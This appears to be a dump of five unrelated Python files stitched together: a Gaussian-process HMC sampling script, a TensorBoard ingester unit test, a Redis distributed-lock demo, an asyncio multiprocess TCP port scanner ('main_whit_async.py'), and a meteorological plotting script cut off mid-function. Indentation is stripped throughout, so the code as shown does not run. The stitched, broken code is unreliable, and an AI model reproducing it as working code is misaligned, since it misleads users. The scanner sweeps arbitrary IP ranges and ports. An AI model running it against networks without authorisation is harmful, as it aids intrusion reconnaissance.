surrogate_posterior = tfd.JointDistributionSequential(flat_component_dists)
def target_log_prob_fn(*inputs):
params = [tf.squeeze(a) for a in inputs]
loss = mover.log_posterior(*params)
return loss
start = time.time()
losses = tfp.vi.fit_surrogate_posterior(target_log_prob_fn, surrogate_posterior,optimizer=tf.optimizers.Adam(learning_rate=0.1, beta_2=0.9), num_steps=5000)
steps = []
max_step = 0.0
for i in range(len(mover.kernel_params)):
stdstep = surrogate_posterior.stddev()[i].numpy()
meanp = surrogate_posterior.mean()[i].numpy()
mover.kernel_params[i].assign(meanp)
if stdstep.max()>max_step:
max_step = stdstep.max()
steps.append(stdstep)
steps = [(1e-2/max_step)*s for s in steps]
start = time.time()
# sample from the posterior
num_samples=200#4000
burn_in=500
kr = mover.hmc_sample(num_samples=num_samples, skip=8, burn_in=burn_in, init_step=steps)
print(np.sum(kr.inner_results.is_accepted.numpy()/num_samples))
# sample from the posterior
#mover.hmc_sample(num_samples=2000, skip=0, burn_in=1000)
end = time.time()
lengths = mover.get_lengthscale_samples(X=pZ)
np.save('data/length_switch_' + str(threadid) + '.npy',lengths)
amps = mover.get_amplitude_samples()
np.save('data/amp_switch_' + str(threadid) + '.npy',amps)
for i in range(len(mover.kernel_params)):
output = mover.samples_[i].numpy()
np.save('data/all_switch_' + str(i) + '_' + str(threadid) + '.npy',output)
print(threadid,end - start)
def parallel_run(threadid, gpu):
with tf.name_scope(gpu):
with tf.device(gpu):
setup_and_run_hmc(threadid)
return
df = pd.read_csv('data/switch.csv',index_col=0)
X = df[['Latitude','Longitude']].values
ID = df['Animal'].values
secs =(pd.to_datetime(df['Date'])- pd.datetime(2000,1,1)).dt.seconds.astype(float).values
days = (pd.to_datetime(df['Date'])- pd.datetime(2000,1,1)).dt.days.astype(float).values
T = (days*24*60+secs/60)/(60*24)
T = T-T[0]
T=T[:,None]
uT = np.unique(T).copy()
z_skip=10
Z = uT[::z_skip,None].copy()
pZ = uT[::z_skip,None].copy()
np.random.shuffle(Z)
gpu_list = tf.config.experimental.list_logical_devices('GPU')
num_threads = len(gpu_list)
print(num_threads)
threads = list()
start = time.time()
for index in range(num_threads):
x = threading.Thread(target=parallel_run, args=(index,gpu_list[index].name))
threads.append(x)
x.start()
for index, thread in enumerate(threads):
thread.join()
end = time.time()
print('Threaded time taken: ', end-start)
|
server_ingester_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for `tensorboard.data.server_ingester`."""
import os
import subprocess
import tempfile
import threading
import time
from unittest import mock
import grpc
from tensorboard import test as tb_test
from tensorboard.data import grpc_provider
from tensorboard.data import server_ingester
from tensorboard.util import grpc_util
class ExistingServerDataIngesterTest(tb_test.TestCase):
def test(self):
addr = "localhost:6806"
with mock.patch.object(grpc, "secure_channel", autospec=True):
ingester = server_ingester.ExistingServerDataIngester(
addr,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
class SubprocessServerDataIngesterTest(tb_test.TestCase):
def test(self):
# Create a fake server binary so that the `os.path.exists` check
# passes.
fake_binary_path = os.path.join(self.get_temp_dir(), "server")
with open(fake_binary_path, "wb"):
pass
binary_info = server_ingester.ServerBinary(
fake_binary_path, version=None
)
tmpdir = tempfile.TemporaryDirectory()
self.enter_context(
mock.patch.object(
tempfile, "TemporaryDirectory", return_value=tmpdir
)
)
port_file = os.path.join(tmpdir.name, "port")
error_file = os.path.join(tmpdir.name, "startup_error")
real_popen = subprocess.Popen
# Stub out `subprocess.Popen` to write the port file.
def fake_popen(subprocess_args, *args, **kwargs):
def target():
time.sleep(0.2) # wait one cycle
with open(port_file, "w") as outfile:
outfile.write("23456\n")
result = mock.create_autospec(real_popen, instance=True)
result.stdin = mock.Mock()
result.poll = lambda: None
result.pid = 789
threading.Thread(target=target).start()
return result
tilde_logdir = "~/tmp/logs"
expanded_logdir = os.path.expanduser(tilde_logdir)
self.assertNotEqual(tilde_logdir, expanded_logdir)
with mock.patch.object(subprocess, "Popen", wraps=fake_popen) as popen:
with mock.patch.object(grpc, "secure_channel", autospec=True) as sc:
ingester = server_ingester.SubprocessServerDataIngester(
server_binary=binary_info,
logdir=tilde_logdir,
reload_interval=5,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
samples_per_plugin={
"scalars": 500,
"images": 0,
},
extra_flags=["--extra-flags", "--for-fun"],
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
expected_args = [
fake_binary_path,
"--logdir=%s" % expanded_logdir,
"--reload=5",
"--samples-per-plugin=scalars=500,images=all",
"--port=0",
"--port-file=%s" % port_file,
"--die-after-stdin",
"--error-file=%s" % error_file,
"--verbose", # logging is enabled in tests
"--extra-flags",
"--for-fun",
]
popen.assert_called_once_with(expected_args, stdin=subprocess.PIPE)
sc.assert_called_once_with(
"localhost:23456", mock.ANY, options=mock.ANY
)
class ServerInfoTest(tb_test.TestCase):
def test_version_none(self):
b = server_ingester.ServerBinary("./server", version=None)
self.assertTrue(b.at_least_version("0.1.0"))
self.assertTrue(b.at_least_version("999.999.999"))
def test_version_final_release(self):
b = server_ingester.ServerBinary("./server", version="0.4.0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertFalse(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
def test_version_prerelease(self):
b = server_ingester.ServerBinary("./server", version="0.5.0a0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertTrue(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
if __name__ == "__main__":
tb_test.main()
|
use_case_one.py
|
from distrilockper import Config
from distrilockper.lock_helper import DistributerLockHelper
config = Config()
config.use_single_server().set_config(host='0.0.0.0', port=6379)
helper = DistributerLockHelper()
helper.create(config)
class ticketSalse():
def __init__(self):
self.ticket_count = 1
def buy(self):
Locker1 = helper.get_reentrant_lock(key='ticketSalse')
re1 = Locker1.try_lock(2, 10, 'second')
print("get lock:", re1)
if re1:
if self.ticket_count > 0:
self.ticket_count -= 1
print("sale one, remain: ", self.ticket_count)
Locker1.unlock()
Locker1.unlock()
else:
print("get lock failed")
print(self.ticket_count)
def ticket_num(self):
print(self.ticket_count)
import threading
import time
sale = ticketSalse()
threads = []
for i in range(100):
print(i)
threads.append(threading.Thread(target = sale.buy))
threads[i].start()
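# Completion step (a sketch, not in the original snippet): wait for every buyer
# thread started above to finish, then print the remaining ticket count.
for t in threads:
    t.join()
sale.ticket_num()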
|
main_whit_async.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from multiprocessing import Event,JoinableQueue,Pool,Process,Value,Queue
import io,os,sys,time,threading,queue,asyncio,socket,argparse
import pgbar,tracemalloc,ports_g,iprange_g
def eq_put_y(task,workers,procs):
if task == 0:
yield 0
if procs == 1:
for i in range(procs):
if task >= workers:
task-=workers
yield task
else:
yield 0
elif procs > 1:
for i in range(procs):
if task >= workers*procs:
task-=workers
yield task
elif task*procs >= workers/procs and task < workers*procs:
if task > procs:
task=task-(int(task/procs)+task%procs)
yield task
elif task < procs:
yield 0
elif task*procs < workers/procs:
yield 0
def eq_put_iprange(task,workers,procs,ipseed,wqport):
while True:
if task != 0:
while not eq.full():
if task == 0:
break
eg=eq_put_y(task,workers,procs)
eql=[]
#print('[eq_put_iprange]task =',task)
a=task;task=next(eg);c=a-task
#print('[eq_put_iprange]ipseed:',ipseed)
eql.append(ipseed)
ipseed=iprange_g.set_end(ipseed,c)
eql.append(c)
eql.append(wqport)
print('[eq_put_iprange]eql :',eql,'task=',task)
eq.put(eql)
elif task == 0:
break
ee.clear()
ee.wait()
def eq_put_iplist(task,workers,procs,ipseed,wqport):
while True:
if task != 0:
while not eq.full():
if task == 0:
break
eg=eq_put_y(task,workers,procs)
#print('[eq_put_iplist]task =',task)
a=task;task=next(eg)
for i in range(task,a):
eql=[]
eql.append(ipseed[i])
eql.append('list')
eql.append(wqport)
print('[eq_put_iplist]eql :',eql,'task=',task)
eq.put(eql)
elif task == 0:
break
ee.clear()
ee.wait()
def eq_put_fast(task,workers,ipseed,port_g):
portlist=[]
iplist=[]
def eq_put_fast_set(iplist,portlist):
eql=[]
eql.append(iplist)
eql.append('fast')
eql.append(portlist)
print('[eq_put_iplist_fast]eql :',eql)
return eql
ipseed_t=type(ipseed)
if ipseed_t == list:
for ip in ipseed:
iplist.append(ip)
elif ipseed_t == tuple:
ipg=iprange_g.ip_iter(ipseed[0],task)
for ip in ipg:
iplist.append(ip)
n=0
for p in port_g:
n+=1
portlist.append(p)
if n == workers:
while True:
if not eq.full():
eql=eq_put_fast_set(iplist,portlist)
eq.put(eql)
portlist=[]
n=0
break
else:
ee.clear()
ee.wait()
while True:
if not eq.full() and len(portlist) != 0:
eql=eq_put_fast_set(iplist,portlist)
eq.put(eql)
elif len(portlist) == 0:
return
else:
ee.clear()
ee.wait()
def get_ip_g(check_ip,host,ipr):
if check_ip > 0:
ipseed=iprange_g.set_seed(ipr)
elif check_ip == 0:
ipseed=host
return ipseed
def get_port_g(check_port,ps,pe,sp):
if check_port > 0:
port_g=ports_g.port_range(ps,pe)
elif check_port == 0:
port_g=ports_g.port_list(sp)
return port_g
def efunc():
global alltask,workers,procs,chekc_ip,check_port,ps,pe,sp,host,ipr
print('[efunc]event tid',threading.current_thread().name,'is starting...')
port_g=get_port_g(check_port,ps,pe,sp)
ipseed_type=get_ip_g(check_ip,host,ipr)
print('[efunc]port_g:',port_g,'|ipseed_type:',type(ipseed_type))
if alltask < procs:
eq_put_fast(alltask,workers,ipseed_type,port_g)
elif alltask >= procs:
if type(ipseed_type) == tuple:
while True:
try:
wqport=next(port_g)
#print('[efunc]wqport:',wqport)
except:
break
task=alltask
eq_put_iprange(task,workers,procs,ipseed_type[0],wqport)
elif type(ipseed_type) == list:
while True:
try:
wqport=next(port_g)
#print('[efunc]wqport:',wqport)
except:
break
task=alltask
eq_put_iplist(task,workers,procs,ipseed_type,wqport)
#print('[efunc]task =',task,'et set',et.is_set(),'| ee set',ee.is_set())
n=0
while True:
while not eq.full():
n+=1
if n <= procs:
eq.put('done')
#print('[efunc]n =',n,'eq empty',eq.empty(),'ee set:',ee.is_set())
if procs == 1:
ee.clear()
return
elif n > procs and eq.empty():
return
ee.clear()
ee.wait()
return
def progress():
global alltask,procs,ports,st,progress_count,allcount
bartask=alltask*ports
print('[progress]workers are running...bartask:',bartask)
ee.wait()
for _ in range(procs):
print('[progress]worker pid :',state_pid.get())
while True:
time.sleep(1)
pgbar.bar(bartask,progress_count.value,50,st)
print('[progress]progress_count=',progress_count.value,'allcount=',allcount.value)
if bartask == allcount.value:
pgbar.bar(bartask,allcount.value,50,st)
break
def c_e_th():
pevent=threading.Thread(target=efunc,name='pevent_tid='+str(os.getpid())+'/0')
#pgbar_th=threading.Thread(target=progress,name='progress_th')
pevent.start()
#pgbar_th.start()
#pgbar_th.join()
pevent.join()
print('\n[c_e_th]there is no more task,efunc done,use time:%.2f' % (time.time()-st)+'s')
print('='*60)
return
def pefunc():
print('[pefunc]pid',os.getpid(),'pefunc is starting......')
c_e_th()
print('[pefunc]pefunc done......')
return
###################################################################################
def eq_get(we):
global wg_ready,weqget,wqport,ip_g
wg_ready=True
wqe=[]
wqport=None
ip_g=None
if not eq.empty() and weqget:
wqe=eq.get()
print('[eq_get]pid',os.getpid(),'wqe=',wqe)
eq.task_done()
#print('[eq_get]pid-%s wqe=%s'%(os.getpid(),wqe))
tag=wqe[-2]
if wqe != 'done' and wqe != [] and tag != 'fast' and tag != 'list':
wqport=wqe.pop()
ipcounts=wqe.pop()
ipseed=wqe.pop()
#print('[eq_get]wqe:',wqe)
ip_g=iprange_g.ip_iter(ipseed,ipcounts)
wg_ready=False
we.set()
ee.set()
elif wqe != 'done' and wqe != [] and tag == 'fast':
wqe.pop(-2)
wqport=wqe.pop()
#print('[eq_get]wqe:',wqe)
ip_g=(x for x in wqe.pop())
wg_ready=False
we.set()
ee.set()
elif wqe != 'done' and wqe != [] and tag == 'list':
wqe.pop(-2)
wqport=wqe.pop()
#print('[eq_get]wqe:',wqe)
ip_g=(x for x in wqe.pop())
wg_ready=False
we.set()
ee.set()
elif wqe == 'done':
weqget=False
ee.set()
#print('[eq_get]pid-%s [%s,%s] | eq empty:%s | weqget=%s'%(os.getpid(),wqa,wqb,eq.empty(),weqget))
elif eq.empty() and weqget:
ee.set()
        eq_get(we)
elif eq.empty() and not weqget:
return
def wq_put(we):
global wg_ready,wqport,ip_g,weqget
we.wait()
if weqget:
if type(wqport) == list:
while not wq.full():
try:
x=next(ip_g)
except:
we.clear()
if wg_ready:
pass
else:
if not wg_ready and weqget:
eq_get(we)
elif not weqget:
return
for p in wqport:
s=None
s=(x,p)
#print('[wq_put]x=',x)
wq.put(s)
else:
while not wq.full():
try:
x=next(ip_g)
#print('[wq_put]pid',os.getpid(),'x=',x)
except:
#print('[wq_put]pid',os.getpid(),'x=None,ip_g is stop|wg_ready:',wg_ready)
we.clear()
if wg_ready:
pass
else:
if not wg_ready and weqget:
eq_get(we)
elif not weqget:
return
x=(x,wqport)
#print('[wq_put]x=',x)
wq.put(x)
async def work(loop,we):
global opencount,closecount,ptime,progress_count
while True:
addr=None
con=''
wst=time.time()
if not wq.empty():
addr = wq.get()
#print('[work]pid',os.getpid(),'get addr:',addr)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(0)
progress_count.value+=1
try:
con=await loop.sock_connect(s,addr)
except OSError as err:
closecount+=1
err=str(err)
std='%s,%s,%s\n'%(addr[0],addr[1],err)
res_cache.append(std)
#print('[work]pid',os.getpid(),addr,err)
if con == None:
opencount+=1
#print('pid',os.getpid(),addr,'open')
std='%s,%s,open\n'%(addr[0],addr[1])
res_cache.append(std)
s.close()
ptime+=time.time()-wst
elif weqget and wq.empty():
wq_put(we)
elif addr == None and not weqget:
#print('[work]pid',os.getpid(),'progress_count.value',progress_count.value)
break
return
def res_thread(workers,res_cache):
global weqget,work_done
print('[res_thread]res_thread tid',threading.current_thread().name,'is starting...')
while True:
#print('[res_thread]pid',os.getpid(),'weqget:',weqget)
if not work_done:
res_save(workers,res_cache)
elif work_done:
while len(res_cache):
res_save(workers,res_cache)
break
time.sleep(1)
return
def res_save(workers,res_cache):
v=''
for i in range(workers):
try:
v+=res_cache.pop()
except:
continue
try:
reslog.write(v)
except:
errlist.append(v)
reslog.flush()
return
def pwfunc():
global alltime,allcount,work_done
#print('[pwfunc]pid-',os.getpid(),'is running...')
state_pid.put(os.getpid())
res_save_thread=threading.Thread(target=res_thread,args=(workers,res_cache),name='res_thread_tid='+str(os.getpid()))
res_save_thread.start()
we=asyncio.Event()
we.set()
selloop=asyncio.SelectorEventLoop()
asyncio.set_event_loop(selloop)
loop = asyncio.get_event_loop()
corus = prepare(workers,loop,we)
fs=asyncio.gather(*corus)
loop.run_until_complete(fs)
loop.close()
work_done=True
res_save_thread.join()
alltime.value+=ptime
#print('[pwfunc]pid',os.getpid(),'ee set:',ee.is_set())
#print('\ntracemalloc:',tracemalloc.get_traced_memory())
print('[pwfunc]pid=%s\treal time:%.4fs\topen_counts:%s\tclose_counts:%s' % (os.getpid(),ptime,opencount,closecount))
print('[pwfunc]pid=%s\tuse time:%.4fs'%(os.getpid(),time.time()-st)+'\twq empty:'+str(wq.empty())+'\tres_err count:'+str(len(errlist)))
while len(errlist):
reslog.write('err:\t'+errlist.pop())
reslog.flush()
return os.getpid(),opencount,closecount
def cb_w_p_fin(result):
global p_fin_c,procs,opencount,closecount
opencount+=result[1]
closecount+=result[2]
p_fin_c.append(result[0])
#print('[cb_w_p_fin]',p_fin_c)
if len(p_fin_c) == procs:
p_wfunc.terminate()
return
def workers_y(a,loop,we):
for i in range(a):
yield work(loop,we)
def prepare(workers,loop,we):
count=0
corus=[]
workers_g=workers_y(workers,loop,we)
while True:
try:
x = next(workers_g)
except:
break
corus.append(x)
count+=1
print('[prepare]pid-%s workers is ready'%os.getpid())
return corus
############################################################################
def delcache():
cachedir='__pycache__'
try:
os.chdir(cachedir)
except:
return
flist=os.listdir()
while True:
try:
os.remove(flist.pop())
except:
os.rmdir('../'+cachedir)
os.chdir('../')
return
return
def check_input():
    parser=argparse.ArgumentParser(description='set the host or ip range that will be scanned, with port range as int. default scan ports 1-1024.')
parser.add_argument("-v", "--version",action='version', version='%(prog)s 1.0')
parser.add_argument('-host',type=str,nargs='*',default='127.0.0.1',help="set host list like '192.168.0.1 192.168.0.2' default 127.0.0.1")
parser.add_argument('-range',type=str,help="set ip range to scan like '192.168.0.1-192.168.1.1' just once")
parser.add_argument('-ps',type=int,nargs='?',default=1,help='set start port vaule')
parser.add_argument('-pe',type=int,nargs='?',default=1024,help='set end port vaule')
parser.add_argument('-sp',type=int,nargs='+',help="set specify port vaule like '80 135 137'")
parser.add_argument('-procs',type=int,nargs='?',default=os.cpu_count(),help='set multiprocessing to running')
parser.add_argument('-workers',type=int,nargs='?',default=1,help='set workers to running')
parser.parse_args()
args=parser.parse_args()
ps=args.ps
pe=args.pe
sp=args.sp
host=args.host
ipr=args.range
procs=args.procs
workers=args.workers
    if type(procs) != int or procs > (os.cpu_count()*16):
        print('please set right procs number here and not greater than %s.'%(os.cpu_count()*16))
        sys.exit()
    elif type(workers) != int or workers > (65536/(os.cpu_count()*16)):
        print('please set right workers number here and not greater than %s.'%(65536/(os.cpu_count()*16)))
        sys.exit()
ip=iprange_g.check_iprange(ipr)
host=iprange_g.check_host(host)
port=ports_g.check_p(ps,pe)
portlist=ports_g.check_p(sp)
if ip and portlist:
print("ip range :",ip)
ipseed=iprange_g.set_seed(ip)
ipcounts=iprange_g.ip_counts(ipseed)
print("the ip range start ",ipseed[0]," counts ",ipcounts)
return ipcounts,len(sp),1,0,workers,procs,ps,pe,sp,host,ip
elif host and portlist:
print("ip range :",host)
return len(host),len(sp),0,0,workers,procs,ps,pe,sp,host,ip
elif ip and port:
print("ip range :",ip)
ipseed=iprange_g.set_seed(ip)
ipcounts=iprange_g.ip_counts(ipseed)
print("the ip range start ",ipseed[0]," counts ",ipcounts)
return ipcounts,pe-ps+1,1,1,workers,procs,ps,pe,sp,host,ip
elif host and port:
print("ip range :",host)
return len(host),pe-ps+1,0,1,workers,procs,ps,pe,sp,host,ip
else:
print("please set ipaddr/port numbers or range")
sys.exit(0)
############################################################################################
if __name__=='__main__':
alltask,ports,check_ip,check_port,workers,procs,ps,pe,sp,host,ipr=check_input()
    print('[main]alltask:%s ports:%s check_ip:%s check_port:%s'%(alltask,ports,check_ip,check_port))
#tracemalloc.start()
st=time.time()
delcache()
#public var set
eq=JoinableQueue(procs)
state_pid=Queue()
alltime=Value('d',0.0)
#allcount=Value('i',0)
progress_count=Value('i',0)
#log file set
fname='./result.log'
try:
os.remove(fname)
except:
pass
os.path.exists(fname)
reslog=open(fname,'a')
#start procs
ee=Event()
p_efunc=Process(target=pefunc)
p_efunc.start()
#set var to work procs
wq=queue.Queue(int(workers*procs))
weqget=True
ip_g=None
wqport=None
wg_ready=False
work_done=False
ptime=0
opencount=0
closecount=0
wq_cache=[]
res_cache=[]
errlist=[]
p_fin_c=[]
p_wfunc=Pool(procs)
for _ in range(procs):
p_wfunc.apply_async(pwfunc,callback=cb_w_p_fin)
p_wfunc.close()
p_efunc.join()
p_wfunc.join()
print('\n[main]all works done,saved to %s'%fname)
reslog.close()
print('\nResult of Execution :')
print('\nprocs : %s\tcorus : %s\tqueue maxsize : %s' % (procs,workers,wq.maxsize))
print('real time:%.4fs\topened:%s\tclosed:%s\tall:%s'%(alltime.value,opencount,closecount,opencount+closecount))
print('use time: %.4f' % (time.time()-st)+'s')
|
plot_from_pp_geop_height_pot_temp_and_wind_diff_by_date_range.py
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
#matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import scipy.interpolate
import pdb
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
model_name_convert_legend = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_legend.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'temp'
pp_file_contour ='408'
plot_diag='temp'
#plot_diags=['sp_hum']
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['djzny', 'djznw', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#Experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklwu', 'dklzq', 'dkbhu',] # All 12
#experiment_ids = ['dkbhu', 'dkjxq']
#experiment_ids = ['dkmbq', 'dklyu', 'djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#experiment_ids = ['dklyu, dkmgw']
experiment_ids = ['dklyu']
diff_id='dkmgw'
#min_contour = 0
#max_contour = 3
#tick_interval=0.3
#clevs = np.linspace(min_contour, max_contour,64)
#cmap=cm.s3pcpn_l
cmap = plt.cm.RdBu_r
#ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
un = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
def main():
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = -72.
clev_max = 72.
elif p_level == 850:
clev_min = -72.
clev_max = 72.
elif p_level == 700:
clev_min = -72.
clev_max = 72.
elif p_level == 500:
clev_min = -72.
clev_max = 72.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 850:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 700:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 500:
clevpt_min = -3.
clevpt_max = 3.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 850:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 700:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 500:
clevsh_min = -0.0025
clevsh_max = 0.0025
else:
print 'Specific humidity min/max not set for this pressure level'
#clevs_col = np.arange(clev_min, clev_max)
clevs_lin = np.arange(clev_min, clev_max, 4.)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
diffmin1 = diff_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s_on_p_levs_mean_by_date_range.pp' % (expmin1, experiment_id, experiment_id, pp_file_contourf)
pfile_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s_on_p_levs_mean_by_date_range.pp' % (diffmin1, diff_id, diff_id, pp_file_contourf)
pcube_contourf = iris.load_cube(pfile, p_level_constraint)
#pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,3600)
pcube_contourf_diff = iris.load_cube(pfile_diff, p_level_constraint)
#pcube_contourf_diff=iris.analysis.maths.multiply(pcube_contourf_diff,3600)
#pdb.set_trace()
height_pp_file = '%s_%s_on_p_levs_mean_by_date_range.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
height_pp_file_diff = '%s_%s_on_p_levs_mean_by_date_range.pp' % (diff_id, pp_file_contour)
height_pfile_diff = '%s%s/%s/%s' % (pp_file_path, diffmin1, diff_id, height_pp_file_diff)
#pdb.set_trace()
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
pcube_contour_diff = iris.load_cube(height_pfile_diff, p_level_constraint)
pcube_contourf=pcube_contourf-pcube_contourf_diff
pcube_contour=pcube_contour-pcube_contour_diff
del pcube_contourf_diff, pcube_contour_diff
time_coords = pcube_contourf.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
time_coords = pcube_contour.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
fu = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean_by_date_range.pp' \
% (expmin1, experiment_id, experiment_id)
fu_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean_by_date_range.pp' \
% (diffmin1, diff_id, diff_id)
#pdb.set_trace()
u_wind,v_wind = iris.load(fu, p_level_constraint)
u_wind_diff,v_wind_diff = iris.load(fu_diff, p_level_constraint)
u_wind = u_wind - u_wind_diff
v_wind = v_wind - v_wind_diff
del u_wind_diff, v_wind_diff
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
#pdb.set_trace()
#height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
height_cube_slice = pcube_contour[t]
u_wind_slice = u_wind[t]
v_wind_slice = v_wind[t]
#pdb.set_trace()
# Get time of averagesfor plot title
h = un.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
# from_zone = tz.gettz('UTC')
# to_zone = tz.gettz('Asia/Kolkata')
# h_utc = un.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
# h_local = h_utc.astimezone(to_zone).strftime('%H%M')
### Winds
cs_w = u_wind_slice.coord_system('CoordSystem')
lat_w = u_wind_slice.coord('grid_latitude').points
lon_w = u_wind_slice.coord('grid_longitude').points
lons_w, lats_w = np.meshgrid(lon_w, lat_w)
lons_w,lats_w = iris.analysis.cartography.unrotate_pole(lons_w,lats_w, cs_w.grid_north_pole_longitude, cs_w.grid_north_pole_latitude)
lon_w=lons_w[0]
lat_w=lats_w[:,0]
### Regrid winds to 2 degree spacing
lat_wind_1deg = np.arange(lat_low,lat_high, 2)
lon_wind_1deg = np.arange(lon_low,lon_high, 2)
#pdb.set_trace()
lons_wi, lats_wi = np.meshgrid(lon_wind_1deg, lat_wind_1deg)
fl_la_lo = (lats_w.flatten(),lons_w.flatten())
p_levs = u_wind_slice.coord('pressure').points
sc = np.searchsorted(p_levs, p_level)
u = scipy.interpolate.griddata(fl_la_lo, u_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
v = scipy.interpolate.griddata(fl_la_lo, v_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
################################### # PLOT ##############################################
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
#pdb.set_trace()
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
#x_w,y_w = m(lons_wi, lats_wi)
if plot_diag=='temp':
min_contour = clevpt_min
max_contour = clevpt_max
cb_label='K'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
and wind (vectors) %s' % h
